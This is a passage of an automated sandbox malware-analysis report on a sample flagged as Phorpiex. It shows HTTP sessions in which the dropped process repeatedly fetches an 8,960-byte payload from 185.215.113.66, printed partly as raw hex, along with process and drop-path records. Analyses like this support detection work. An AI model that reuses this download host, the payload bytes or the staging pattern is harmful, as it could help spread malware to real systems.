                                                                                                                                  Data Ascii: sW]_|OYWqj*"n+H|\E[E'Y|{e:Y]uXjRe7~p)x~jt"u>Nj>k@"eQoN;$4xnv2`AStR)O%S1cYXuN*T`XWVTpf+%{%]Pz;z%"VzgZjI;bz.MMbb5hmo%!Mt0xpg&v2Hoc:?W{6FV#m_Mo24)OW#E>?WiUV#p{%I}hb$lm1s^z'4{spxWP?QE)!U:07(t60pwah_4\N}c|]{cV'yfd.CI:U+Q"fyO9/f}mL{ZO$E).6$dtc?1>H'4U^<W%,1%((180aqv!kxX-|M1Z^\oqyq].{~}D7K{2auOWa["E?!DS*ySexPJ K@~nZH/MY"tZO|nNuX\^s-[a[3Ks-@5zH|{I uU
                                                                                                                                  Oct 28, 2024 11:11:26.495412111 CET1236INData Raw: 80 b5 d7 f9 5b 0f c6 8c 89 48 4e a5 7d ec ec b7 81 41 9b e2 ba 5a 73 79 30 a4 03 3d 69 39 77 3a b5 22 f0 12 25 1c 3b 8d 3d 2a 07 fb 31 ad 6b 58 9c f7 38 e5 76 eb 84 dd 18 91 5c 0c 56 9e 5f 05 39 22 e3 c8 e5 8d 0b eb 2a 4d f3 0f 23 8b eb 23 4b db
                                                                                                                                  Data Ascii: [HN}AZsy0=i9w:"%;=*1kX8v\V_9"*M##K5sN:$!;3*`Nj=g4;N)TJ9E+&}TrUDJ^J3[PO<utH?u%
                                                                                                                                  Oct 28, 2024 11:11:26.495430946 CET1236INData Raw: 4f 01 2b ed 3e 8d 0a 28 fd 86 a8 c1 f8 c9 ff 2c 83 0b c0 df 28 08 0a 68 a7 d6 bc 7f 84 88 04 d8 bb a1 b4 e2 13 e6 e4 f2 17 49 14 c4 50 f9 f5 18 a2 ec 8d fd 05 45 b1 83 b3 96 3f b0 42 05 3d 49 9d 59 63 97 2e 71 e6 28 37 1f 33 7b 73 68 a1 fb 7f 3e
                                                                                                                                  Data Ascii: O+>(,(hIPE?B=IYc.q(73{sh>=1I4M2tHdT?GI0)}g`f2[&gU" +1B w[ \o]4VpO3m:&xDrCg7"KctAPFF+X&JR
                                                                                                                                  Oct 28, 2024 11:11:26.495439053 CET1236INData Raw: 9c 9b 32 f7 89 0e 26 33 e4 db 73 cb 44 c8 ad 4b 2a 03 96 c0 75 08 ab f6 68 d0 09 8a d4 c7 cb 4f 1a bb 8b fc bd 6d 65 ef e2 0d 34 ca 1f 62 0e 5e dd 6d 62 54 8c ed e2 a7 b0 66 33 7e 49 b1 97 44 23 e6 fc 48 5c 3d 53 ab c3 82 1a ad f2 40 c4 dd 36 df
                                                                                                                                  Data Ascii: 2&3sDK*uhOme4b^mbTf3~ID#H\=S@6HwC2p%7S)u~ycWwhh&rd7<1CI>TO.kP+Qr5nR^qwK.pN_`c1|oZUQz6m..
                                                                                                                                  Oct 28, 2024 11:11:26.495455980 CET848INData Raw: b5 07 b1 f8 ff ab ba 72 91 7d 3b 4d 79 e1 4a 5c 1c 93 3c 37 2a 55 85 e9 c1 f3 df 18 a3 3d 15 a0 79 e4 6d 84 d8 f4 9c a1 38 f8 b3 60 ff d5 c6 cb 1b 4f ba 8c e1 22 c3 db 86 e6 68 47 1b 4f aa 3f 94 86 08 ec 85 54 61 d7 e5 b4 65 8e ed e9 bb 2f 40 be
                                                                                                                                  Data Ascii: r};MyJ\<7*U=ym8`O"hGO?Tae/@ %\nfR.^upVogo@^W<(Gs`eJC?4<~9.Ru*vj{Ak=~a}uhs;-^a0
                                                                                                                                  Oct 28, 2024 11:11:26.495464087 CET1236INData Raw: 03 09 67 9e 94 0b a9 8f 2f af 32 2a 79 22 47 0d f6 6d 61 b0 89 16 a0 bd b0 51 56 5f 06 9d 51 37 03 38 58 77 07 85 00 b1 22 3d a9 e4 69 5e ec 1d 08 16 72 73 bd 16 d5 0f 40 1e 36 d0 e9 f4 a3 f1 b9 8d 30 fd 1d 0b e3 cc 92 fe 40 70 3e 8e f5 89 14 79
                                                                                                                                  Data Ascii: g/2*y"GmaQV_Q78Xw"=i^rs@60@p>yu?lwY]wyHEnx[F=v=#5)NrLGNL,`X0lC%181>1gAU/P(uTBO}kH.eL0sNHAJ{E1xwuq0!NMag
                                                                                                                                  Oct 28, 2024 11:11:26.495481014 CET1236INData Raw: f4 e1 fe 2d f1 a8 34 f7 87 2f ed 69 be 62 f0 bd f8 14 a6 a4 e2 9b a5 39 f5 ba 74 8c 7e 3b 57 f1 f7 41 6c 2d a6 80 61 d4 e7 1f 64 94 50 18 24 96 1e 4d 77 33 08 e9 ea fb 28 f0 36 04 92 80 3b 09 cc d7 7b a4 b4 88 cc e4 ca 7b 02 4d 72 52 92 e3 42 23
                                                                                                                                  Data Ascii: -4/ib9t~;WAl-adP$Mw3(6;{{MrRB#PqLu'&3V`rgHa~*.FKp'*9CGlqlLx[ER*)DaO2_Vwr!B(w*)jodHBRQ`Ri8xmBY+UCWS(
                                                                                                                                  Oct 28, 2024 11:11:26.495488882 CET1236INData Raw: 97 d8 b2 7e f7 bc bd d4 4d 96 6a ab 4b 28 d8 da bd 68 e8 11 53 1b 03 9c f5 14 31 4e e3 9e 11 94 d4 82 75 bc 3c a4 9b b2 e8 a1 4c cc dd 50 fd 90 31 ce f7 39 d8 4a f5 69 98 3e 0b d3 62 13 89 19 d0 c2 f1 e7 92 fc 4f e4 63 2a 44 e2 42 73 1b b0 95 e4
                                                                                                                                  Data Ascii: ~MjK(hS1Nu<LP19Ji>bOc*DBsW a1yHI<bCodyk5?YT^$Homs32~H=5/5U#17N<v:/w4e05w!6&~3
                                                                                                                                  Oct 28, 2024 11:11:26.495505095 CET1236INData Raw: 87 e7 03 eb 06 56 d0 a0 b0 49 f4 0e f1 71 e5 5c 57 b2 f6 6c e3 99 f6 95 e7 8f 0f fb a5 81 df 52 30 7b 22 e6 06 a7 34 02 0b 3c 78 13 e8 3a ff 4c b2 a1 24 88 82 c0 48 a1 0a 6a 3c 57 1e 84 52 0b 63 25 91 15 0c f9 e5 c7 6d 5a 80 e7 88 de a5 30 5d 1c
                                                                                                                                  Data Ascii: VIq\WlR0{"4<x:L$Hj<WRc%mZ0]S.!a27BgM6kt@7gOR,4Q%h.lx H+?4yH&Cpin>n)A1&#!*f16{}0ox\Y_y':0?P1+^|
                                                                                                                                  Oct 28, 2024 11:11:26.495515108 CET1236INData Raw: e6 45 93 aa b3 b0 d5 72 d9 02 40 48 8d e8 25 9f bf 0b 88 92 22 ea a1 21 d4 de 18 e0 3e 77 13 1d 18 fa d7 ca bb b2 5b b0 0c 3f 33 7a 54 71 90 c2 c1 8f 56 16 9c cb 4d a1 f5 08 2b ad 24 fc 96 01 39 d3 ab 83 ef ac cb 54 3b da 43 14 e0 f0 17 8e f7 03
                                                                                                                                  Data Ascii: Er@H%"!>w[?3zTqVM+$9T;C*CVc94q3oSD;n:z]a-0I7LyWj80;f`k_M3t8dEu[hSCJa]wi#.*4ShD~
                                                                                                                                  Oct 28, 2024 11:11:26.500952005 CET1236INData Raw: b5 a1 2b 4b 70 05 a5 fd 1c 87 be e6 10 ed f7 a5 94 bc 3d 4d e6 63 fe bf da 3f 6f 2f 70 8c b3 b5 b2 47 c4 2f 57 6f 53 fd b3 71 a5 fe 88 95 23 d5 e3 e3 e9 62 3e 8b 44 ac d8 46 e6 73 81 82 09 88 3e 72 05 a7 9b 8c 8b 98 24 bb 8f 4c e0 60 07 bc 7f aa
                                                                                                                                  Data Ascii: +Kp=Mc?o/pG/WoSq#b>DFs>r$L`d=K\6D;QZIl]|WZeZ}pJZ[.|m9Cm<yq-g_ICJU5_C%f)r Ce6&\(,!#gJ


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  4192.168.2.457562185.215.113.66803060C:\Windows\sysppvrdnvs.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 28, 2024 11:11:28.415307045 CET166OUTGET /2 HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                  Host: 185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:29.339632034 CET1236INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                  Date: Mon, 28 Oct 2024 10:11:29 GMT
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  Content-Length: 8960
                                                                                                                                  Last-Modified: Fri, 18 Oct 2024 09:57:02 GMT
                                                                                                                                  Connection: keep-alive
                                                                                                                                  ETag: "671230ee-2300"
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Data Raw: 24 ca 67 ed 72 35 5d b1 46 f1 4d 5b 99 be 6f 06 49 cd 95 a1 a2 11 e9 12 d3 c7 e2 35 85 45 62 e3 98 c2 b5 e8 b3 c3 bf 4c 36 2c 95 69 25 c7 6b 5a 0e 12 d1 d0 d9 38 1e 82 f6 e8 65 50 49 7c 94 06 0f 9b 93 3c f5 9e 69 71 94 f4 be ed 23 e0 11 fd 01 bb d6 0f 4f 40 35 bd 1b 55 7c 2a 7b 60 29 b2 bc d2 5d 82 48 ae a6 d6 e5 8d b7 02 e1 04 86 78 c0 95 2d 88 ea 8d be 64 52 7e 41 f0 7d 22 32 c1 9b e2 e3 14 80 83 e5 cb 20 2b 9c 28 aa 2a ce 52 d2 6d ab 02 db b7 dc 64 f9 a7 cf 21 e1 c6 28 b0 93 0a 24 b9 ec 35 1a 74 e4 b2 b9 a3 cc 46 d5 5d c9 bc 99 ad 3c ab 67 22 d8 c7 97 f2 56 04 28 31 7d 8c 5d 43 1a 88 ae 8d 05 a9 18 e4 b6 73 33 0c 16 37 36 f3 e3 88 97 26 e4 9a b3 ae 0b 49 63 11 8c bf 25 74 ec e5 68 fd 49 ed 80 62 bd f3 a4 fe e9 d1 52 28 e2 bc d0 e5 01 15 9e 7d b8 da 49 45 ae fd 1b 3c fc a8 8a 03 da 5d 9c c4 a1 43 c5 12 ab c3 c4 39 c0 a4 db f5 78 69 7c 06 e7 0e 81 91 f3 84 d2 da f5 d6 2f d6 12 f8 e0 09 3e 79 9d 8a 34 6d e0 ad 0b 33 f0 e1 68 4f 83 05 9c da a4 1f 3b 02 c3 e0 a4 3c 85 7c ab 99 35 b0 2c af 30 dd 74 41 [TRUNCATED]
                                                                                                                                  Data Ascii: $gr5]FM[oI5EbL6,i%kZ8ePI|<iq#O@5U|*{`)]Hx-dR~A}"2 +(*Rmd!($5tF]<g"V(1}]Cs376&Ic%thIbR(}IE<]C9xi|/>y4m3hO;<|5,0tA`JNn;wesqT_:<fb7JH3& f1FGc&k,Jx+c`ws~(sFIT,5\)}-@.4>aue\v=IkB[Q2cLAlTrOUY*mj#uUP>Y{,Tk3h,v)PTK3_++mNP[qeG9f|[-&M~&14w_la/okwM_w^7Rgg%Tv}.Tp;dSuzFPHZIpz50g.`lK\V3tryl2R]?czmvo\ 0oN3aPV=BE\ _^hVf\*n$0qC7BQn.}c/Yd=G-TSx&zwi:,aoouHn8ZxF^=RnUTD9'
                                                                                                                                  Oct 28, 2024 11:11:29.339646101 CET112INData Raw: 93 57 98 e3 4c ac 64 50 69 d5 5e 60 5a 42 6a 17 d0 32 d7 d9 a3 9b b5 09 7a 01 5c d5 9a f5 b4 51 04 76 c6 6d 7e 0d de 69 d1 63 ff bd c2 b8 2c 86 13 5e 38 49 df c1 51 01 c0 d9 12 0c ba 3d d0 82 60 7b 3d ce 3a 38 e6 8c dc 07 d6 cd 79 a1 7c 5e 57 03
                                                                                                                                  Data Ascii: WLdPi^`ZBj2z\Qvm~ic,^8IQ=`{=:8y|^WaO".m).=WP
                                                                                                                                  Oct 28, 2024 11:11:29.339658022 CET1236INData Raw: 1a 7e 54 ab 8b 45 f0 f6 cd be e1 a1 4c 42 63 2a 88 24 37 be 0d 52 6c ca 2d 11 74 6a 4f 1c 96 52 71 18 29 06 58 2e ed 84 4a d6 69 35 40 34 36 fa a4 03 08 6e 3d cc 79 d5 da 9b cd e5 49 62 a0 15 b7 25 90 b3 49 fd 19 9c 00 1d 6e be 47 6c 88 53 1f 7a
                                                                                                                                  Data Ascii: ~TELBc*$7Rl-tjORq)X.Ji5@46n=yIb%InGlSz33(:&eGco%bA;0=X^tiIIsnc:F&lU'/xJQHI9xJ :6A@dq"0o3zC4/mqM
                                                                                                                                  Oct 28, 2024 11:11:29.339673042 CET212INData Raw: 18 79 9c 05 4e c4 8e 9a a9 9d c9 5b 93 d9 75 84 fb 01 3a 8d e5 b7 91 3a 76 75 6b d3 6c a6 b9 fe a4 2f 47 5e 75 68 33 a0 76 87 6a 1a b3 ec d4 d7 f1 a1 5a c1 ff 30 43 2c 25 b0 ea 1e 1b 51 9d 20 86 8b df 35 f9 6d 0b 1e 79 38 0d bc 65 b9 0b 84 27 d9
                                                                                                                                  Data Ascii: yN[u::vukl/G^uh3vjZ0C,%Q 5my8e'+o{D82.p/{hp'SS/g)WJ4)`&a0oc]Uo(4M'_sG@mxy6("S9%5]9
                                                                                                                                  Oct 28, 2024 11:11:29.339682102 CET1236INData Raw: fa 5b 97 db f5 94 68 b8 31 5f fe c4 26 82 f5 02 7d e0 2c bd 66 0c 8c cc 0e fc 17 a4 4f c2 8a ae 90 ef 82 6e cf 15 16 d7 c2 4e 95 48 a4 f8 cb 2a 07 12 63 9c 16 c5 9a 3e d2 cc 2f 86 a9 f5 19 e9 95 3a dc 91 e1 49 28 a8 1f 91 c0 2b 5f 61 f6 5b e8 b3
                                                                                                                                  Data Ascii: [h1_&},fOnNH*c>/:I(+_a[;Q|~E|$e|B#IynhJ|k;OTvmk@5Hdtrh S^LO&,8_\KA0VIMF&n;B!]U~1&w\TU
                                                                                                                                  Oct 28, 2024 11:11:29.339692116 CET1236INData Raw: 57 93 66 9d 53 e2 88 5c 44 17 93 c0 35 91 9b c1 14 4c d0 91 fe aa bd 52 c5 29 72 9d e3 bc 39 de cd a5 b4 b1 58 e9 96 a3 2b 25 d0 11 07 be f8 ed 89 71 be 79 12 82 18 46 ac a6 88 ba 3d 5a 96 af 3f a5 ef 1f e9 da 21 18 33 69 f5 e3 08 b7 9c 52 4d 92
                                                                                                                                  Data Ascii: WfS\D5LR)r9X+%qyF=Z?!3iRMpl/BrlB7-*Yt;|rS{.gdfow%f.tBH{:Ba{%dPL(Q6V>m:p@Nx!I EKJ
                                                                                                                                  Oct 28, 2024 11:11:29.339704990 CET124INData Raw: 25 69 a2 fd ca 9d e7 bd 81 30 71 7e 33 10 82 8d 90 54 9e bb 7c c3 87 86 d3 12 55 e8 4a 8a 16 82 0c 91 2e b8 d1 1d bb bf dc e7 4c f3 af 8e cf 43 b8 f9 77 31 77 35 65 64 c5 bb ba 51 07 10 a4 ce 44 d9 db b7 71 e2 b5 48 ee fa 05 91 3d 1b c9 c6 91 2e
                                                                                                                                  Data Ascii: %i0q~3T|UJ.LCw1w5edQDqH=.~osXouHePdtnq`Y6G4@4G"
                                                                                                                                  Oct 28, 2024 11:11:29.339714050 CET1236INData Raw: eb 45 4c 97 ef 2a 1d 2d 9e 44 a8 12 24 dd 16 68 4f 59 12 bf 43 b3 04 4d 19 04 15 bf 01 95 74 9f 14 3b 45 eb f3 d9 62 da 79 9d 16 ba d9 cc d4 f6 3b 74 51 be 85 05 66 0a 71 89 56 7b 23 ef 62 eb 74 a4 a1 98 46 d2 dd b1 ee e3 47 91 89 f2 99 71 dc c6
                                                                                                                                  Data Ascii: EL*-D$hOYCMt;Eby;tQfqV{#btFGqNPs%#@#&AG =OPp*uLx!$A<k_xmO1>v@O;KbSs YUN7L'A4Ht\is
                                                                                                                                  Oct 28, 2024 11:11:29.339724064 CET212INData Raw: 44 69 97 04 49 86 d7 b5 59 b2 c1 bc a6 6a 60 69 c7 d9 b8 01 f1 03 06 0d 0c b0 fc aa 40 67 6e cf 94 4b 3d fa 20 12 1c 7b e4 0b 90 7d 37 06 4e 57 b1 53 8d e6 1f 43 0a 22 07 24 10 5a 1b cc 5e 22 4c 64 d0 cf 28 1b 24 a8 fd 5d 0e a7 38 e6 2c 0c cf cb
                                                                                                                                  Data Ascii: DiIYj`i@gnK= {}7NWSC"$Z^"Ld($]8,C"e0+Y_%}a\w_ra=N.>e@b#T\@A$FM.1!FWy7JKPh,2W>>{]t
                                                                                                                                  Oct 28, 2024 11:11:29.339735031 CET1236INData Raw: 03 83 34 fd 15 69 cf c8 fe 55 b2 ed 61 ec 41 49 bc 64 a0 42 b3 ac 4a 85 83 00 2b 3a 92 4f 22 46 0c 37 26 dd da 56 a0 6e 23 a9 52 e0 6a 2a e5 1f 24 2e f0 7a 22 1b 05 a3 f3 9a a7 0e 57 86 82 d7 c4 74 2c 71 4e 03 b7 18 b2 d7 68 22 31 3d 33 49 62 3a
                                                                                                                                  Data Ascii: 4iUaAIdBJ+:O"F7&Vn#Rj*$.z"Wt,qNh"1=3Ib:Y!\fsAF),l;mN|#{S?&P<G5IjYWY>q+fL~W5GXPY?ECjZ@=:pj|KYD$~$nb
                                                                                                                                  Oct 28, 2024 11:11:29.345300913 CET1148INData Raw: 48 d7 82 a7 f1 a9 30 77 2e f3 7a c7 2b ff f9 56 6a 32 57 ca bd 80 37 72 35 81 48 51 9e 7f a7 92 f4 bf ff de 88 c8 93 ee e2 5d a0 c3 86 88 51 28 33 be 06 de c9 e8 6a 3f f4 a4 c0 76 cb 4b 3d fb 7b ae 2c 83 a5 00 6d d1 40 0b 9c c8 1b 85 5e ee a2 dd
                                                                                                                                  Data Ascii: H0w.z+Vj2W7r5HQ]Q(3j?vK={,m@^1?vHl6=Nke&u+bIB`#0s']B4/8>XuP_Q@(^OS$&?Jl[e:s8Mf?Q


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  5192.168.2.457563185.215.113.66803060C:\Windows\sysppvrdnvs.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 28, 2024 11:11:30.365884066 CET166OUTGET /2 HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                  Host: 185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:31.283780098 CET1236INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                  Date: Mon, 28 Oct 2024 10:11:31 GMT
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  Content-Length: 8960
                                                                                                                                  Last-Modified: Fri, 18 Oct 2024 09:57:02 GMT
                                                                                                                                  Connection: keep-alive
                                                                                                                                  ETag: "671230ee-2300"
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Data Raw: 24 ca 67 ed 72 35 5d b1 46 f1 4d 5b 99 be 6f 06 49 cd 95 a1 a2 11 e9 12 d3 c7 e2 35 85 45 62 e3 98 c2 b5 e8 b3 c3 bf 4c 36 2c 95 69 25 c7 6b 5a 0e 12 d1 d0 d9 38 1e 82 f6 e8 65 50 49 7c 94 06 0f 9b 93 3c f5 9e 69 71 94 f4 be ed 23 e0 11 fd 01 bb d6 0f 4f 40 35 bd 1b 55 7c 2a 7b 60 29 b2 bc d2 5d 82 48 ae a6 d6 e5 8d b7 02 e1 04 86 78 c0 95 2d 88 ea 8d be 64 52 7e 41 f0 7d 22 32 c1 9b e2 e3 14 80 83 e5 cb 20 2b 9c 28 aa 2a ce 52 d2 6d ab 02 db b7 dc 64 f9 a7 cf 21 e1 c6 28 b0 93 0a 24 b9 ec 35 1a 74 e4 b2 b9 a3 cc 46 d5 5d c9 bc 99 ad 3c ab 67 22 d8 c7 97 f2 56 04 28 31 7d 8c 5d 43 1a 88 ae 8d 05 a9 18 e4 b6 73 33 0c 16 37 36 f3 e3 88 97 26 e4 9a b3 ae 0b 49 63 11 8c bf 25 74 ec e5 68 fd 49 ed 80 62 bd f3 a4 fe e9 d1 52 28 e2 bc d0 e5 01 15 9e 7d b8 da 49 45 ae fd 1b 3c fc a8 8a 03 da 5d 9c c4 a1 43 c5 12 ab c3 c4 39 c0 a4 db f5 78 69 7c 06 e7 0e 81 91 f3 84 d2 da f5 d6 2f d6 12 f8 e0 09 3e 79 9d 8a 34 6d e0 ad 0b 33 f0 e1 68 4f 83 05 9c da a4 1f 3b 02 c3 e0 a4 3c 85 7c ab 99 35 b0 2c af 30 dd 74 41 [TRUNCATED]
                                                                                                                                  Data Ascii: $gr5]FM[oI5EbL6,i%kZ8ePI|<iq#O@5U|*{`)]Hx-dR~A}"2 +(*Rmd!($5tF]<g"V(1}]Cs376&Ic%thIbR(}IE<]C9xi|/>y4m3hO;<|5,0tA`JNn;wesqT_:<fb7JH3& f1FGc&k,Jx+c`ws~(sFIT,5\)}-@.4>aue\v=IkB[Q2cLAlTrOUY*mj#uUP>Y{,Tk3h,v)PTK3_++mNP[qeG9f|[-&M~&14w_la/okwM_w^7Rgg%Tv}.Tp;dSuzFPHZIpz50g.`lK\V3tryl2R]?czmvo\ 0oN3aPV=BE\ _^hVf\*n$0qC7BQn.}c/Yd=G-TSx&zwi:,aoouHn8ZxF^=RnUTD9'
                                                                                                                                  Oct 28, 2024 11:11:31.283879995 CET1236INData Raw: 93 57 98 e3 4c ac 64 50 69 d5 5e 60 5a 42 6a 17 d0 32 d7 d9 a3 9b b5 09 7a 01 5c d5 9a f5 b4 51 04 76 c6 6d 7e 0d de 69 d1 63 ff bd c2 b8 2c 86 13 5e 38 49 df c1 51 01 c0 d9 12 0c ba 3d d0 82 60 7b 3d ce 3a 38 e6 8c dc 07 d6 cd 79 a1 7c 5e 57 03
                                                                                                                                  Data Ascii: WLdPi^`ZBj2z\Qvm~ic,^8IQ=`{=:8y|^WaO".m).=WP~TELBc*$7Rl-tjORq)X.Ji5@46n=yIb%InGlSz33(:&eGco%bA;0=X^
                                                                                                                                  Oct 28, 2024 11:11:31.283895969 CET1236INData Raw: 25 31 0a 68 9c d8 ba 48 4c 90 81 b7 28 74 68 c8 16 f9 b8 2a c6 90 b0 6c 31 39 f2 bf 87 64 53 3a 32 36 df 01 fc e5 9e 18 72 19 69 e2 c7 ef 65 32 01 84 09 84 3b 94 85 f3 13 25 da 52 6f 20 19 c5 d9 dd d1 da 08 6e 35 b4 1e 41 c3 9d d9 91 9f 3f 3a 82
                                                                                                                                  Data Ascii: %1hHL(th*l19dS:26rie2;%Ro n5A?:p"~ B'P?:/B1%yN[u::vukl/G^uh3vjZ0C,%Q 5my8e'+o{D82.p/{hp'SS/g)W
                                                                                                                                  Oct 28, 2024 11:11:31.283911943 CET1236INData Raw: f3 0c 7b d7 90 9d 53 08 50 35 7a 7f 49 0b 16 9f ae a3 19 6a 1b 05 aa 5c 54 c6 1f 37 73 99 af 43 61 76 51 11 f2 eb 89 90 be 6d c9 bd 48 20 04 57 6d a3 8a 18 2a 96 64 13 63 ca 0d 0f 2d 28 7f 61 ff eb 80 38 1c 6f fd f6 59 64 de 2b f7 3d 76 66 94 76
                                                                                                                                  Data Ascii: {SP5zIj\T7sCavQmH Wm*dc-(a8oYd+=vfvB"1C,/m#u?n8CpT}v#0]{&T;I]#zYw8OA{kK&GFMXFJ+I$?r-:Pw_gN/6p"]c{1 N
                                                                                                                                  Oct 28, 2024 11:11:31.283926010 CET448INData Raw: f3 c6 cf f8 95 24 43 84 1e 1f 9b 9c d9 67 06 dc 57 43 c0 ff d4 c9 b4 19 52 67 b0 40 5c 8f 00 ab 9d ff 39 47 b4 07 78 4f 3d ea 81 53 76 ad 4d 76 16 a5 b7 2e e5 b9 6d 89 3c f6 9f 00 cc a4 9a b7 cc 8f b1 36 f8 1a e3 38 6a df fd 09 9e 74 6f 47 14 bc
                                                                                                                                  Data Ascii: $CgWCRg@\9GxO=SvMv.m<68jtoG M,"p-R6(=6;BS)2Mq#+dM1;oyAzm@!<Enk ?C=|9PednGDF%F-_!Y^uODIuH"oR^k=%
                                                                                                                                  Oct 28, 2024 11:11:31.283941984 CET1236INData Raw: eb 45 4c 97 ef 2a 1d 2d 9e 44 a8 12 24 dd 16 68 4f 59 12 bf 43 b3 04 4d 19 04 15 bf 01 95 74 9f 14 3b 45 eb f3 d9 62 da 79 9d 16 ba d9 cc d4 f6 3b 74 51 be 85 05 66 0a 71 89 56 7b 23 ef 62 eb 74 a4 a1 98 46 d2 dd b1 ee e3 47 91 89 f2 99 71 dc c6
                                                                                                                                  Data Ascii: EL*-D$hOYCMt;Eby;tQfqV{#btFGqNPs%#@#&AG =OPp*uLx!$A<k_xmO1>v@O;KbSs YUN7L'A4Ht\is
                                                                                                                                  Oct 28, 2024 11:11:31.283957005 CET1236INData Raw: 44 69 97 04 49 86 d7 b5 59 b2 c1 bc a6 6a 60 69 c7 d9 b8 01 f1 03 06 0d 0c b0 fc aa 40 67 6e cf 94 4b 3d fa 20 12 1c 7b e4 0b 90 7d 37 06 4e 57 b1 53 8d e6 1f 43 0a 22 07 24 10 5a 1b cc 5e 22 4c 64 d0 cf 28 1b 24 a8 fd 5d 0e a7 38 e6 2c 0c cf cb
                                                                                                                                  Data Ascii: DiIYj`i@gnK= {}7NWSC"$Z^"Ld($]8,C"e0+Y_%}a\w_ra=N.>e@b#T\@A$FM.1!FWy7JKPh,2W>>{]t4iUaAIdBJ+:O"
                                                                                                                                  Oct 28, 2024 11:11:31.283972025 CET1236INData Raw: 35 cc 98 17 45 ee fe 11 2f 11 f1 a7 11 08 7a 36 51 5b b6 a4 0e 15 e5 4f 37 a2 fb 50 32 88 95 be 22 83 f8 5b e1 64 e4 26 6d 00 c2 f9 4d d2 e9 39 54 4c 7c cb b9 79 ca fe 4c 17 8d 93 22 88 09 b9 f5 c4 36 45 30 a8 2c c4 29 da af 3d 55 db 50 b9 bd 72
                                                                                                                                  Data Ascii: 5E/z6Q[O7P2"[d&mM9TL|yL"6E0,)=UPr4;2JaQ{f8-{=i,JHy +9Oq;;=`}>b2[6R+6w|Ajc,{2.dEp,YsEn8W!A2Ou`H0w.z+Vj2W7r5HQ
                                                                                                                                  Oct 28, 2024 11:11:31.283988953 CET124INData Raw: d0 b8 b8 a4 7a f1 78 a6 de a0 98 fd d5 94 21 bb 17 c0 a8 30 d8 8a ec e3 68 e4 92 ee fd a2 e1 0f 48 24 3b bd 86 96 39 f7 ff d2 03 60 b8 c4 c9 a9 36 ad c1 5c 28 3c f3 9d ac d2 56 a1 15 36 37 e1 45 39 05 02 82 2f aa 3a 6a 3b 9e 3e 7c 57 a3 17 b7 f3
                                                                                                                                  Data Ascii: zx!0hH$;9`6\(<V67E9/:j;>|Wk<cb4Gcap`%SmttII@i


                                                                                                                                  Statistics

                                                                                                                                  CPU Usage

                                                                                                                                  Click to jump to process

                                                                                                                                  Memory Usage

                                                                                                                                  Click to jump to process

                                                                                                                                  High Level Behavior Distribution

                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                  Behavior

                                                                                                                                  Click to jump to process

                                                                                                                                  System Behavior

                                                                                                                                  General

                                                                                                                                  Target ID:0
                                                                                                                                  Start time:06:11:07
                                                                                                                                  Start date:28/10/2024
                                                                                                                                  Path:C:\Users\user\Desktop\Bjl3geiFEK.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Users\user\Desktop\Bjl3geiFEK.exe"
                                                                                                                                  Imagebase:0x4b0000
                                                                                                                                  File size:10'240 bytes
                                                                                                                                  MD5 hash:ED9FBBBE548C41479CB70E4D694793D0
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:low
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:1
                                                                                                                                  Start time:06:11:12
                                                                                                                                  Start date:28/10/2024
                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\33080.scr
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\33080.scr" /S
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:85'504 bytes
                                                                                                                                  MD5 hash:06560B5E92D704395BC6DAE58BC7E794
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000001.00000002.1840086247.000000000042E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000001.00000000.1806932551.0000000000410000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\AppData\Local\Temp\33080.scr, Author: Joe Security
                                                                                                                                  Antivirus matches:
                                                                                                                                  • Detection: 100%, Avira
                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                  • Detection: 82%, ReversingLabs
                                                                                                                                  Reputation:low
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:2
                                                                                                                                  Start time:06:11:14
                                                                                                                                  Start date:28/10/2024
                                                                                                                                  Path:C:\Windows\sysppvrdnvs.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Windows\sysppvrdnvs.exe
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:85'504 bytes
